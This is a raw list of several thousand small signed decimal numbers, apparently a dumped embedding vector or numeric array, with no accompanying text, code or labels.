0.0048939865082502365, -0.06335160881280899, 0.003345850622281432, -0.004916504956781864, 0.0005831312737427652, 0.005543265491724014, 0.04848949983716011, 0.027157122269272804, 0.0017733195563778281, 0.0483994260430336, -0.005577043164521456, 0.017219027504324913, -0.0166935995221138, 0.004102091770619154, 0.004781395196914673, 0.030925191938877106, -0.020761912688612938, -0.013360884040594101, -0.04533693194389343, -0.01784954033792019, -0.004413595423102379, 0.018209833651781082, 0.008924770168960094, 0.014073965139687061, -0.030745044350624084, 0.0014496183721348643, 0.02253335528075695, -0.016888758167624474, 0.03104528971016407, 0.0216926708817482, 0.0077613224275410175, 0.02529560588300228, -0.019741080701351166, -0.02969418838620186, -0.01860015094280243, 0.022488318383693695, 0.008444379083812237, -0.029664164409041405, 0.0009410791099071503, 0.053383488208055496, 0.002002255991101265, 0.02437986060976982, 0.028027832508087158, -0.013886312022805214, -0.017729442566633224, 0.0002981334982905537, 0.013743695802986622, 0.0024113391991704702, 0.007359745446592569, 0.033267099410295486, 0.0036085646133869886, -0.008421860635280609, 0.019635995849967003, 0.012197435833513737, -0.02822299115359783, 0.010365944355726242, 0.0015556422295048833, -0.023479126393795013, -0.0003237011842429638, 0.0032276292331516743, -0.020401619374752045, 0.03653976693749428, -0.0400526262819767, 0.008654549717903137, 0.029093699529767036, -0.009187484160065651, -0.001754554221406579, 0.0016644808929413557, -0.026331448927521706, -0.008226701989769936, -0.007228388451039791, 0.012009783647954464, 0.056536056101322174, -0.029664164409041405, -0.016393354162573814, 0.0008528822800144553, 0.024830227717757225, 0.035008519887924194, -0.043445389717817307, 0.008729611523449421, -0.017489247024059296, -0.0525728277862072, 0.020566754043102264, 0.015372522175312042, -0.019485874101519585, 0.018645187839865685, -0.00035184912849217653, -0.01936577633023262, 0.014156532473862171, -0.02053673006594181, -0.041433751583099365, -0.04113350808620453, 0.014486800879240036, -0.02528059296309948, -0.003480960614979267, 0.035428859293460846, -0.04416597634553909, -0.021752720698714256, 0.014209074899554253, -0.0022180569358170033, -0.018465042114257812, -0.0029649152420461178, 0.017639368772506714, -0.003906932659447193, -0.0000294380424747942, 0.009637851268053055, -0.027847684919834137, 0.014261617325246334, 0.03720030188560486, 0.02152753621339798, 0.027562452480196953, -0.0492401123046875, 0.008917263709008694, 0.02954406663775444, -0.016498439013957977, -0.0008791536674834788, 0.010493548586964607, -0.003929451107978821, -0.022173061966896057, 0.049360208213329315, -0.014817070215940475, -0.03287678211927414, 0.0020472926553338766, -0.005194231402128935, 0.011446824297308922, -0.026061229407787323, -0.012655309401452541, -0.0022762292064726353, -0.0010893248254433274, 0.0005545142339542508, 0.020326558500528336, 0.0038018471095710993, -0.03870152682065964, 0.050771359354257584, 0.032666608691215515, 0.0517621673643589, -0.020131399855017662, -0.034077759832143784, 0.009465210139751434, 0.03389761224389076, 0.017894577234983444, 0.005002825520932674, 0.04863962158560753, 0.017504259943962097, 0.005790967494249344, -0.004147128202021122, -0.006327654700726271, -0.009938095696270466, 0.070077084004879, 0.020551741123199463, -0.02236822061240673, 0.022743526846170425, -0.005723412148654461, -0.03485839441418648, 0.04398583248257637, -0.039362065494060516, -0.009878046810626984, -0.06055933237075806, -0.0008266108925454319, -0.02020646072924137, -0.02137741446495056, 0.0018718373030424118, 0.016543475911021233, 0.010913890786468983, -0.024725141003727913, -0.023419076576828957, 0.0060424222610890865, 0.028523234650492668, -0.032006073743104935, 0.01843501813709736, -0.0027997808065265417, 0.01751927100121975, 0.05263287574052811, -0.01661853678524494, -0.01540254708379507, -0.010313400998711586, 0.013458463363349438, 0.011124061420559883, -0.013173230923712254, 0.026136290282011032, -0.017459223046898842, 0.02337404154241085, 0.015492620877921581, -0.012925528921186924, -0.010478535667061806, 0.03398768603801727, -0.04848949983716011, 0.014531837776303291, 0.002694695023819804, -0.0030061989091336727, -0.014404233545064926, 0.01628826931118965, 0.008571982383728027, -0.021812768653035164, -0.01860015094280243, -0.0014177174307405949, -0.006744244135916233, 0.0034359239507466555, -0.012790419161319733, -0.0011418677167966962, 0.004346040543168783, -0.00012690025323536247, 0.006928143557161093, -0.005471957381814718, 0.007821371778845787, 0.0009499926236458123, 0.031255461275577545, 0.0021373662166297436, 0.0002344488020753488, -0.015117314644157887, 0.019726069644093513, 0.01547760795801878, -0.04365556314587593, -0.04578729718923569, 0.023989541456103325, -0.01742919720709324, -0.009202496148645878, 0.0016466538654640317, -0.001796776195988059, 0.022413257509469986, 0.010786286555230618, -0.0009542148327454925, -0.004105844534933567, -0.0019590959418565035, 0.00676300935447216, -0.01594298705458641, -0.0019065530505031347, -0.0158529132604599, -0.008166652172803879, -0.0250253863632679, -0.02304377220571041, -0.025986168533563614, -0.00667668879032135, -0.00896980706602335, 0.023298978805541992, 0.04791903495788574, 0.016333304345607758, -0.0006713281036354601, 0.03696010634303093, -0.006286371033638716, -0.010358437895774841, 0.016558488830924034, 0.014351691119372845, -0.0068643419072031975, -0.009817997924983501, 0.03963228315114975, 0.038581427186727524, -0.026481572538614273, -0.04023277387022972, -0.00382999493740499, 0.025836046785116196, -0.013083158060908318, -0.01702386699616909, -0.017489247024059296, 0.028343088924884796, 0.008234207518398762, 0.003899426432326436, -0.005441932938992977, 0.02919878624379635, -0.01828489452600479, 0.011604453437030315, 0.01760934479534626, -0.01810474880039692, -0.003206987399607897, 0.0241997130215168, -0.024890275672078133, 0.014209074899554253, 0.012542717158794403, 0.0013980137882754207, 0.030835118144750595, 0.0014965315349400043, 0.013961372897028923, -0.014914649538695812, 0.0056708697229623795, -0.009562790393829346, -0.007652483880519867, -0.024394871667027473, -0.03305692970752716, -0.00534435361623764, 0.04779893904924393, 0.029438981786370277, 0.0031338029075413942, -0.0016513451701030135, -0.014681960456073284, -0.018314920365810394, 0.0059298304840922356, -0.011709538288414478, 0.03602935001254082, -0.01645340397953987, 0.019005481153726578, -0.00026459054788574576, -0.008271737955510616, 0.009930589236319065, 0.06233077496290207, -0.02979927510023117, -0.005595808383077383, -0.003929451107978821, 0.018570126965641975, 0.011349244974553585, -0.0022893650457262993, -0.008526946417987347, 0.026856878772377968, 0.04113350808620453, 0.015207388438284397, -0.01352601870894432, -0.015072277747094631, -0.037170279771089554, -0.04605751857161522, 0.03611942380666733, 0.008024036884307861, -0.007873914204537868, -0.004312262870371342, -0.011972252279520035, 0.008834696374833584, 0.0005620203446596861, -0.023163869976997375, 0.018495066091418266, -0.006526566576212645, -0.015192375518381596, -0.005100404843688011, 0.0069769336842000484, 0.0035729105584323406, -0.008511933498084545, -0.009360125288367271, 0.018660200759768486, -0.0029574092477560043, -0.00577970826998353, -0.013653622008860111, 0.0005043170531280339, 0.005250527057796717, -0.000600020051933825, -0.002961162244901061, 0.011762081645429134, -0.02828303910791874, 0.026736779138445854, -0.021662646904587746, 0.01405895221978426, -0.01163447741419077, 0.0012206818209961057, -0.005393143277615309, 0.015717804431915283, 0.02936392091214657, -0.0010611769976094365, -0.02696196362376213, -0.01485460065305233, 0.005622079595923424, 0.04056304320693016, -0.012422619387507439, -0.016663573682308197, 0.00773880397900939, 0.003161950735375285, -0.007873914204537868, 0.047108374536037445, 0.006849329452961683, -0.004969047848135233, 0.018224846571683884, 0.01477203331887722, 0.03437800332903862, -0.018465042114257812, -0.02218807488679886, -0.004244707990437746, 0.014043940231204033, -0.026226364076137543, -0.012137386947870255, -0.02636147476732731, -0.031255461275577545, 0.010335919447243214, -0.03966230899095535, 0.016498439013957977, 0.023584211245179176, -0.019575946033000946, -0.010756262578070164, 0.025836046785116196, 0.02570093609392643, -0.024349834769964218, -0.010523572564125061, 0.02678181603550911, 0.026091253384947777, -0.0024788943119347095, -0.016423378139734268, 0.02661668136715889, 0.009690393693745136, 0.016483427956700325, 0.008481909520924091, 0.00825672596693039, 0.005415661726146936, 0.0057421778328716755, 0.003516614669933915, -0.011401788331568241, -0.006286371033638716, 0.022233111783862114, 0.005471957381814718, -0.033837564289569855, -0.0047363582998514175, 0.00021380698308348656, -0.005393143277615309, -0.021992916241288185, -0.007723791990429163, 0.022158050909638405, -0.008406848646700382, 0.026061229407787323, -0.01577785238623619, -0.0028635826893150806, 0.018915409222245216, -0.02903365157544613, 0.0075061144307255745, -0.01547760795801878, 0.02652660943567753, 0.021962890401482582, 0.0010273994412273169, 0.032666608691215515, -0.010110735893249512, -0.0034058995079249144, 0.011626971885561943, 0.007918951101601124, 0.00310753146186471, -0.014246605336666107, 0.014081470668315887, 0.04737859591841698, -0.012460149824619293, 0.01130420807749033, 0.0006295753410086036, 0.007190857548266649, 0.02344910241663456, 0.00038586120354011655, -0.007708779536187649, -0.041343677788972855, 0.0021017121616750956, 0.03548891097307205, -0.002784768585115671, 0.008586995303630829, -0.015627730637788773, -0.006894366350024939, -0.020326558500528336, 0.005269292276352644, -0.025145484134554863, 0.03569908067584038, -0.027247196063399315, 0.004563717637211084, -0.025100447237491608, 0.020671838894486427, 0.004642531741410494, -0.0067930337972939014, -0.01556768175214529, 0.004188411869108677, -0.006879353895783424, 0.017879564315080643, -0.050441090017557144, -0.01022332813590765, -0.0028804715257138014, -0.03569908067584038, 0.016243232414126396, -0.005111664067953825, 0.023253943771123886, 0.006143754813820124, -0.009765454567968845, 0.007265918888151646, 0.016558488830924034, 0.003858142765238881, 0.005993632599711418, -0.006871847901493311, -0.02570093609392643, -0.004863962065428495, 0.03281673416495323, -0.019245678558945656, 0.0013445328222587705, -0.01978611759841442, -0.007693767547607422, -0.018795311450958252, -0.04698827862739563, 0.02368929795920849, 0.0179396141320467, 0.03563903272151947, 0.011033988557755947, 0.0015631483402103186, -0.04164392501115799, -0.0254607405513525, -0.02011638693511486, 0.004946529399603605, 0.009667875245213509, 0.015042253769934177, 0.021392427384853363, -0.014426751993596554, 0.0333871990442276, -0.007494855206459761, -0.022308172658085823, -0.04515678435564041, -0.012542717158794403, -0.0108463354408741, -0.018389981240034103, -0.009780467487871647, -0.0012188053224235773, 0.002246204763650894, 0.04641781374812126, 0.026661718264222145, 0.005010331515222788, -0.0133533775806427, 0.01486210711300373, 0.003899426432326436, -0.007224635221064091, -0.01744421012699604, 0.01869022473692894, 0.024650080129504204, -0.006635405123233795, 0.025085434317588806, -0.01109403744339943, -0.0014167791232466698, -0.025235557928681374, 0.018209833651781082, -0.0025145483668893576, -0.011371763423085213, -0.025836046785116196, -0.0012507063802331686, -0.011679514311254025, -0.041433751583099365, -0.016648562625050545, 0.0042972504161298275, -0.0022011680994182825, -0.006290123797953129, -0.03437800332903862, 0.0000762926138122566, -0.01114657986909151, 0.04197419434785843, 0.0019365776097401977, -0.024229736998677254, 0.011356751434504986, -0.03179590031504631, 0.017834527418017387, 0.03831120952963829, -0.04065311700105667, -0.02694695070385933, -0.014892131090164185, -0.011326726526021957, 0.0005906373844482005, 0.004192165099084377, -0.0020829467102885246, -0.03521868959069252, -0.023884456604719162, 0.023674285039305687, 0.027562452480196953, 0.005539512727409601, -0.039001770317554474, -0.004773888736963272, 0.021662646904587746, -0.012122374959290028, -0.014719490893185139, 0.033327147364616394, -0.023148857057094574, -0.0325465127825737, -0.02026650868356228, 0.017474234104156494, -0.001600678893737495, 0.010350932367146015, -0.00880467239767313, 0.010561103001236916, 0.012422619387507439, 0.023344015702605247, 0.017249051481485367, -0.027172135189175606, -0.0037774520460516214, -0.04047296941280365, -0.019741080701351166, -0.013315847143530846, -0.013173230923712254, -0.02855326049029827, -0.001637271256186068, -0.009029855951666832, 0.0014214704278856516, 0.005839757155627012, -0.02561086229979992, -0.04107346013188362, 0.01280543114989996, 0.002251834375783801, -0.015229906886816025, -0.0029742978513240814, -0.004413595423102379, 0.04014270007610321, 0.009540271945297718, 0.02853824757039547, -0.02211301401257515, 0.0014721367042511702, 0.00921750906854868, 0.008046554401516914, -0.02822299115359783, 0.0026215105317533016, 0.023824406787753105, 0.004950282629579306, -0.0204616691917181, -0.014591886661946774, 0.009194990620017052, -0.003888167440891266, -0.011251665651798248, 0.00765998987480998, -0.041613899171352386, 0.034768324345350266, 0.008917263709008694, -0.03557898476719856, 0.006946909241378307, 0.004976553842425346, 0.02320890687406063, -0.018344944342970848, -0.020386606454849243, 0.01164198387414217, 0.03554895892739296, -0.024920299649238586, 0.04374563694000244, -0.000391490786569193, -0.0060536814853549, -0.013263304717838764, -0.0029574092477560043, -0.036840010434389114, -0.02185780555009842, -0.023073796182870865, 0.002623387146741152, -0.001387692871503532, 0.021467488259077072, -0.0002420722012175247, -0.01343594491481781, -0.03410778567194939, 0.003387134289368987, 0.013345872052013874, 0.01351100578904152, 0.004469891078770161, 0.028328076004981995, -0.033327147364616394, -0.03497849404811859, 0.006515307351946831, -0.014681960456073284, -0.004132116213440895, -0.030354727059602737, 0.016648562625050545, 0.03038475103676319, 0.0007553027826361358, 0.005197984166443348, -0.007723791990429163, 0.012700345367193222, 0.01735413633286953, -0.02379438281059265, 0.021752720698714256, -0.005224255844950676, 0.020086362957954407, 0.0049652946181595325, -0.010260858573019505, 0.012602766044437885, -0.0010133254108950496, -0.011717044748365879, 0.015132326632738113, -0.001996626378968358, -0.01694880612194538, 0.0012094227131456137, -0.0004735889087896794, -0.0036798727232962847, -0.027937758713960648, 0.02594113163650036, 0.003769946051761508, 0.0007459201151505113, 0.050771359354257584, -0.01828489452600479, -0.023178881034255028, 0.03551893308758736, -0.008827190846204758, 0.0024864005390554667, 0.018735261633992195, 0.013788732700049877, -0.010403474792838097, -0.02011638693511486, -0.015507632866501808, -0.01014076080173254, 0.014321666210889816, 0.010996458120644093, 0.006481530144810677, -0.018404992297291756, 0.030399763956665993, 0.01289550494402647, 0.002859829692170024, -0.009990638121962547, 0.02154254913330078, -0.03203609585762024, -0.006335160695016384, -0.022413257509469986, 0.019666019827127457, -0.03665986284613609, -0.01911056786775589, 0.022413257509469986, 0.0018558867741376162, 0.009953107684850693, -0.012174917384982109, -0.0047063338570296764, -0.014073965139687061, 0.000010079011190100573, 0.006046175491064787, -0.006747996900230646, -0.006177532486617565, -0.012340052053332329, 0.012287509627640247, 0.0029405204113572836, 0.029183773323893547, -0.017249051481485367, -0.022968711331486702, -0.012295016087591648, -0.013646116480231285, 0.0012394471559673548, 0.011919709853827953, -0.015807876363396645, -0.017384162172675133, -0.01878029853105545, 0.021812768653035164, -0.0020116386003792286, -0.0191856287419796, -0.0015922345919534564, -0.010613646358251572, 0.022007927298545837, 0.0014721367042511702, 0.003165703732520342, 0.03933203965425491, 0.02019144780933857, -0.007442312780767679, 0.005276798736304045, 0.01272286381572485, -0.0021636374294757843, 0.040172725915908813, 0.0025539554189890623, -0.02919878624379635, -0.019966265186667442, 0.014246605336666107, -0.0013970755971968174, 0.0054869698360562325, 0.004860209301114082, -0.015192375518381596, 0.0392119437456131, 0.0017808256670832634, 0.008977312594652176, -0.025430716574192047, -0.02326895482838154, -0.021662646904587746, -0.010913890786468983, 0.002730349078774452, 0.005243021063506603, -0.020596778020262718, -0.03897174820303917, 0.011109049431979656, 0.0675550326704979, 0.02368929795920849, 0.017158977687358856, 0.0005746869137510657, 0.0037511808332055807, -0.00913494173437357, -0.013158218935132027, 0.015837902203202248, -0.025851057842373848, 0.02328396774828434, -0.0058585223741829395, -0.0059298304840922356, 0.007675002329051495, 0.013788732700049877, 0.011214135214686394, -0.026811841875314713, 0.009247533045709133, -0.010335919447243214, 0.02077692560851574, 0.0034302943386137486, -0.007040735334157944, 0.005453192163258791, 0.008376823738217354, -0.02838812582194805, 0.007693767547607422, -0.006076199933886528, 0.002546449424698949, 0.00515294773504138, -0.010718731209635735, 0.0051904781721532345, -0.014989710412919521, 0.0042522139847278595, 0.009930589236319065, -0.008466897532343864, -0.009127435274422169, 0.010170784778892994, 0.0076036942191421986, -0.004098338540643454, 0.02103213220834732, -0.011904697865247726, -0.008827190846204758, -0.02604621835052967, 0.0072358944453299046, -0.02886851690709591, 0.010636163875460625, -0.01845002919435501, 0.02870338223874569, -0.004304756876081228, 0.0014505566796287894, -0.01568777859210968, 0.02586607076227665, -0.015642743557691574, 0.016243232414126396, 0.0241997130215168, -0.005273045506328344, 0.012174917384982109, 0.012933035381138325, 0.016243232414126396, -0.011649489402770996, -0.023659273982048035, 0.006248840596526861, 0.010531079024076462, -0.013811251148581505, -0.0018605781951919198, 0.010365944355726242, 0.010020663030445576, -0.010778780095279217, 0.016078097745776176, 0.008519439958035946, 0.032096147537231445, 0.014644429087638855, 0.01759433187544346, 0.003846883773803711, -0.006928143557161093, 0.0031938517931848764, 0.03296685591340065, 0.040262799710035324, 0.02736729383468628, -0.018164796754717827, -0.0037249093875288963, 0.05317331477999687, 0.0072358944453299046, -0.008909758180379868, 0.031345535069704056, 0.012963060289621353, 0.0036536012776196003, -0.0143967280164361, -0.030985241755843163, -0.00738226342946291, -0.02586607076227665, 0.0008252034895122051, 0.015199881978332996, 0.014134014025330544, -0.016588512808084488, 0.0029630386270582676, 0.0033927636686712503, 0.01744421012699604, -0.006466517690569162, 0.0010771274100989103, 0.006222568918019533, -0.007190857548266649, -0.025685923174023628, 0.020071350038051605, -0.003687378717586398, 0.009360125288367271, -0.006121236365288496, 0.0020604284945875406, 0.007416041102260351, 0.005051615182310343, -0.011611958965659142, -0.006113730370998383, 0.0038318715523928404, 0.02019144780933857, -0.02621135115623474, -0.0020547988824546337, 0.008084085769951344, 0.0038243653252720833, -0.008159146644175053, 0.007678755093365908, -0.02202294021844864, -0.023494139313697815, -0.04605751857161522, 0.022413257509469986, -0.011649489402770996, 0.0325465127825737, -0.003691131714731455, -0.015282449312508106, -0.03446807712316513, 0.008849709294736385, 0.012129881419241428, 0.020566754043102264, -0.0005516994278877974, 0.027937758713960648, -0.04023277387022972, 0.027307244017720222, -0.028102893382310867, 0.006766762118786573, -0.020476680248975754, 0.01384878158569336, 0.003096272237598896, -0.00569714093580842, 0.00763371866196394, 0.03221624344587326, 0.03897174820303917, 0.00267030019313097, -0.007123302668333054, -0.01486210711300373, -0.006391456350684166, 0.021812768653035164, 0.025100447237491608, -0.005535759497433901, -0.025640888139605522, 0.022803576663136482, 0.009667875245213509, 0.012610272504389286, 0.013533524237573147, 0.010891372337937355, 0.0019290713826194406, 0.010838828980922699, -0.0032933077309280634, 0.0006699207006022334, -0.00018565905338618904, 0.04080323874950409, -0.017083916813135147, 0.013083158060908318, 0.006560344249010086, 0.017879564315080643, -0.040172725915908813, -0.003668613499030471, -0.016408367082476616, 0.005978620145469904, -0.02604621835052967, -0.012670321390032768, -0.01753428392112255, 0.0045487056486308575, -0.01845002919435501, -0.035428859293460846, 0.011604453437030315, -0.01344345137476921, -0.023058783262968063, 0.010891372337937355, 0.01726406253874302, -0.015304967761039734, 0.0007928333361633122, 0.037020158022642136, -0.03518866375088692, 0.021722694858908653, 0.0018333684420213103, -0.007442312780767679, 0.0045487056486308575, 0.006612887140363455, 0.021902842447161674, -0.009450198151171207, -0.03131550922989845, -0.004916504956781864, -0.014546849764883518, 0.014636923559010029, 0.010823816992342472, 0.015507632866501808, -0.01751927100121975, -0.01547760795801878, 0.00231751287356019, 0.02744235470890999, -0.012249979190528393, 0.011672007851302624, -0.0350685678422451, 0.0005291810957714915, -0.0064102220349013805, 0.012002277188003063, -0.029258834198117256, -0.0158529132604599, 0.013916335999965668, 0.008849709294736385, -0.022067977115511894, -0.0267067551612854, 0.008241713978350163, 0.006635405123233795, -0.034768324345350266, 0.02260841615498066, 0.01264029648154974, 0.00534435361623764, -0.020671838894486427, 0.011822130531072617, 0.006196297705173492, -0.004469891078770161, 0.020146410912275314, 0.02520553208887577, -0.029408955946564674, 0.0019947499968111515, 0.008384330198168755, -0.022067977115511894, 0.001216928823851049, -0.015897950157523155, -0.019816141575574875, -0.0021373662166297436, -0.009630344808101654, -0.0014646305935457349, -0.012715358287096024, 0.020311545580625534, -0.04482651501893997, -0.003841254161670804, -0.015304967761039734, 0.0017386038089171052, 0.0317358523607254, 0.014081470668315887, -0.00029625697061419487, -0.0014974698424339294, -0.00031502224737778306, -0.016828708350658417, 0.02471012994647026, -0.013083158060908318, 0.008834696374833584, -0.0025502024218440056, 0.019155604764819145, -0.014291642233729362, 0.022398246452212334, 0.011446824297308922, -0.007239647675305605, 0.03497849404811859, -0.014111495576798916, 0.020296534523367882, -0.04539697989821434, -0.01456186268478632, 0.009022349491715431, -0.0083392933011055, 0.017173990607261658, -0.004833937622606754, -0.0062413341365754604, 0.01718900166451931, 0.005708400160074234, -0.018750274553894997, 0.0016175677301362157, 0.009863034822046757, -0.0014787046238780022, -0.00934511236846447, -0.0075736697763204575, -0.012767900712788105, -0.02395951747894287, -0.020506704226136208, 0.005618326831609011, 0.016138145700097084, 0.05665615200996399, 0.006804293021559715, -0.0008791536674834788, -0.013968879356980324, -0.001459000981412828, -0.00703322933986783, 0.004165893420577049, 0.0026140043046325445, -0.02278856374323368, -0.013285823166370392, 0.022173061966896057, -0.01360858604311943, 0.0031225436832755804, 0.006699207238852978, 0.020972084254026413, -0.017639368772506714, -0.005329341161996126, -0.02211301401257515, -0.012550223618745804, 0.004803913179785013, 0.0408933125436306, 0.050921481102705, 0.0010067576076835394, -0.01360858604311943, 0.03623951971530914, -0.01243012584745884, -0.0350385420024395, -0.004518680740147829, -0.015034747309982777, 0.016168171539902687, 0.01077127456665039, -0.001069621299393475, -0.012527705170214176, -0.023569200187921524, -0.00444361986592412, -0.0072771781124174595, -0.014134014025330544, -0.00382999493740499, -0.04554710164666176, 0.004466138314455748, 0.005535759497433901, -0.0073897698894143105, -0.028102893382310867, -0.01802968792617321, 0.007528632879257202, 0.01139428187161684, 0.022082988172769547, -0.023884456604719162, -0.011874672956764698, 0.014501812867820263, 0.012137386947870255, 0.0032820485066622496, 0.0192006416618824, 0.016483427956700325, -0.001524679479189217, 0.020897023379802704, -0.003610440995544195, -0.009772961027920246, -0.0028861011378467083, -0.01652846485376358, 0.015957999974489212, -0.001795837888494134, 0.023839419707655907, -0.007918951101601124, 0.001607246813364327, 0.006481530144810677, 0.003098148852586746, 0.013300835154950619, 0.0007745372131466866, -0.0025971157010644674, 0.008602007292211056, -0.03137555718421936, -0.012490174733102322, -0.015837902203202248, 0.022052964195609093, -0.004034536425024271, 0.026811841875314713, 0.013413426466286182, 0.009750442579388618, -0.018209833651781082, -0.0009954984998330474, -0.022173061966896057, -0.011844648979604244, -0.008376823738217354, 0.004293497651815414, 0.030745044350624084, -0.01218993030488491, 0.011589440517127514, -0.01854010298848152, 0.0027097072452306747, 0.007254659663885832, 0.0018418128602206707, 0.016828708350658417, 0.012452644295990467, -0.007888926193118095, 0.02079193666577339, 0.0004667864996008575, -0.012212448753416538, 0.018329931423068047, 0.007483595982193947, 0.006004891823977232, 0.007036982569843531, -0.012475162744522095, -0.010358437895774841, -0.01093640923500061, -0.02930387109518051, 0.00435729930177331, -0.00569338770583272, -0.0009954984998330474, -0.0036423420533537865, -0.03593927621841431, -0.02037159539759159, 0.016873745247721672, -0.018750274553894997, 0.011236653663218021, -0.009570295922458172, 0.0018868495244532824, -0.011296702548861504, 0.001760183833539486, 0.0030868896283209324, -0.01272286381572485, 0.0005334032466635108, 0.012370076961815357, 0.015927975997328758, 0.011837142519652843, 0.00021333784388843924, -0.00788142066448927, 0.01568777859210968, 0.023914480581879616, 0.021212279796600342, -0.01727907545864582, -0.002084823325276375, -0.0204316433519125, -0.024935312569141388, 0.014201568439602852, 0.04149379953742027, -0.016723623499274254, 0.0011653242399916053, 0.01726406253874302, -0.008046554401516914, 0.0035109850578010082, -0.02404959127306938, -0.02562587521970272, 0.036599814891815186, 0.00177801086101681, 0.007622459437698126, -0.02904866263270378, -0.010861347429454327, -0.01077127456665039, 0.0018981087487190962, 0.007453571539372206, 0.009585307911038399, 0.023809395730495453, 0.008541958406567574, 0.020176436752080917, -0.016123134642839432, -0.014021421782672405, 0.0035410095006227493, -0.02269848994910717, -0.011101542972028255, -0.021707683801651, -0.02996440976858139, 0.02211301401257515, -0.01456186268478632, -0.015657754614949226, -0.003178839571774006, -0.00031314571970142424, -0.021797755733132362, 0.0024601290933787823, 0.02335902862250805, 0.015747828409075737, -0.0004663173749577254, -0.009127435274422169, 0.006008644588291645, -0.005250527057796717, 0.007085772231221199, -0.007675002329051495, -0.024890275672078133, 0.027682550251483917, 0.009472716599702835, 0.0017357890028506517, 0.02310382016003132, -0.002458252478390932, 0.023644261062145233, 0.011844648979604244, -0.0008054999052546918, 0.011259172111749649, -0.0013379649026319385, -0.011687020771205425, 0.0007520188228227198, -0.00586227560415864, 0.02068685181438923, -0.010591127909719944, -0.006245087366551161, -0.009495235048234463, -0.001288236933760345, -0.0068680946715176105, -0.004466138314455748, -0.015064772218465805, 0.023674285039305687, 0.012963060289621353, -0.009420174174010754, 0.01852509006857872, -0.004950282629579306, 0.043595511466264725, 0.008857214823365211, -0.0028316816315054893, 0.006230074912309647, -0.005948595702648163, -0.010253352113068104, 0.015147339552640915, -0.004563717637211084, 0.004417348187416792, 0.0015040376456454396, -0.0017189002828672528, 0.012948047369718552, 0.024650080129504204, -0.0013482858194038272, -0.011799612082540989, -0.007202116772532463, -0.01720401458442211, 0.010320907458662987, -0.00032393576111644506, -0.006973180454224348, -0.005520747043192387, -0.01259526051580906, 0.003002445911988616, -0.0028748419135808945, -0.01344345137476921, 0.006901872344315052, 0.004833937622606754, -0.008121616207063198, 0.017819516360759735, 0.0045937420800328255, 0.0027341023087501526, -0.005922324489802122, -0.012797925621271133, -0.030925191938877106, -0.017399173229932785, 0.01202479563653469, 0.011777093634009361, 0.011867167428135872, -0.017249051481485367, -0.013368389569222927, 0.004687568638473749, 0.00818166509270668, -0.005644598044455051, -0.0013520389329642057, 0.003349603619426489, 0.01861516386270523, 0.006004891823977232, -0.005273045506328344, -0.007157080341130495, -0.017384162172675133, 0.01352601870894432, 0.023509150370955467, -0.0021186007652431726, 0.008114109747111797, -0.014186556451022625, 0.006657923571765423, -0.026856878772377968, 0.014952179975807667, -0.013255798257887363, 0.010313400998711586, -0.022383233532309532, -0.004049548879265785, -0.020596778020262718, -0.012370076961815357, 0.02903365157544613, -0.007295943330973387, 0.009420174174010754, -0.0073034493252635, -0.015507632866501808, -0.00010872137499973178, 0.013878805562853813, 0.006094965152442455, 0.014344184659421444, 0.011717044748365879, -0.011672007851302624, -0.009900565259158611, -0.009645356796681881, 0.02771257422864437, -0.01092890277504921, 0.01022332813590765, 0.004901492968201637, -0.001843689358793199, 0.010606139898300171, 0.00204541627317667, -0.00763371866196394, -0.002430104650557041, 0.000842092209495604, -0.012482668273150921, -0.004518680740147829, -0.006744244135916233, -0.0004266756877768785, 0.010613646358251572, -0.02194787934422493, 0.0026627941988408566, 0.0037661930546164513, 0.0031994814053177834, -0.0007628088933415711, -0.01146934274584055, -0.01685873419046402, -0.013360884040594101, -0.02855326049029827, -0.00006403653969755396, -0.007404781877994537, 0.009855528362095356, -0.009855528362095356, 0.0021373662166297436, 0.007978999987244606, -0.01076376810669899, 0.0027922745794057846, -0.010425993241369724, -0.0229386854916811, -0.008039048872888088, -0.018089735880494118, 0.0031994814053177834, 0.012167411856353283, -0.003659230889752507, 0.017008855938911438, -0.01185215450823307, -0.011206628754734993, -0.006635405123233795, 0.010425993241369724, 0.03882162272930145, 0.02687188982963562, -0.023659273982048035, -0.012249979190528393, 0.006173779256641865, -0.01660352572798729, -0.002251834375783801, 0.013068145141005516, 0.0076449778862297535, 0.004942776635289192, 0.03455815091729164, 0.0075323861092329025, -0.02804284356534481, -0.019320739433169365, 0.00968288816511631, 0.006699207238852978, 0.012557730078697205, 0.005092898849397898, -0.014734502881765366, 0.010118242353200912, 0.013263304717838764, -0.03302690386772156, 0.03605937585234642, -0.009532765485346317, 0.01775946654379368, -0.011214135214686394, 0.026841865852475166, 0.001394260791130364, 0.012340052053332329, 0.034017711877822876, -0.0012084844056516886, -0.02553580142557621, 0.015627730637788773, 0.0009073016117326915, -0.01398389134556055, -0.02229315973818302, 0.006398962810635567, 0.0010705596068874002, -0.01218242384493351, 0.00231563625857234, 0.015147339552640915, 0.014073965139687061, 0.021152229979634285, 0.0016494686715304852, -0.001861516386270523, 0.0027284726966172457, 0.011296702548861504, 0.000323466636473313, -0.018495066091418266, 0.004177152644842863, -0.016408367082476616, -0.01678367145359516, 0.001754554221406579, 0.005239267833530903, -0.009104916825890541, 0.008399342186748981, -0.008767141960561275, 0.012204942293465137, -0.006031163036823273, 0.027487391605973244, -0.001642900868318975, 0.012212448753416538, 0.009983132593333721, 0.006549085024744272, -0.00613249558955431, 0.014171544462442398, -0.018555115908384323, 0.024139665067195892, 0.010921396315097809, -0.0048902337439358234, 0.002056675497442484, -0.013721177354454994, -0.01547760795801878, -0.016573501750826836, 0.0014158408157527447, -0.0018268006388098001, -0.014959686435759068, 0.01397638488560915, -0.004908998962491751, -0.005107910837978125, 0.01786455325782299, -0.018134772777557373, 0.0024563760962337255, 0.002901113359257579, -0.0035297502763569355, -0.007040735334157944, -0.007340980228036642, -0.008579488843679428, 0.01055359747260809, -0.021812768653035164, 0.003888167440891266, 0.020671838894486427, 0.0019759845454245806, -0.00640646880492568, 0.013255798257887363, -0.005212996620684862, 0.01384878158569336, 0.016408367082476616, -0.002923631574958563, 0.029168760403990746, 0.02571594901382923, 0.004529939964413643, 0.016498439013957977, -0.012827949598431587, 0.0006112792179919779, -0.0131432069465518, 0.00613624881953001, -0.006913131568580866, 0.00003471578020253219, 0.000020304625650169328, -0.0011137197725474834, -0.014817070215940475, 0.005381884053349495, 0.025010373443365097, -0.0050778863951563835, -0.0035259972792118788, 0.01540254708379507, -0.024349834769964218, -0.016303280368447304, 0.007367251440882683, -0.014666947536170483, -0.03221624344587326, 0.0008369317511096597, -0.004240954760462046, 0.04065311700105667, 0.009157460182905197, 0.024920299649238586, 0.005543265491724014, -0.000024526816559955478, -0.005141688510775566, 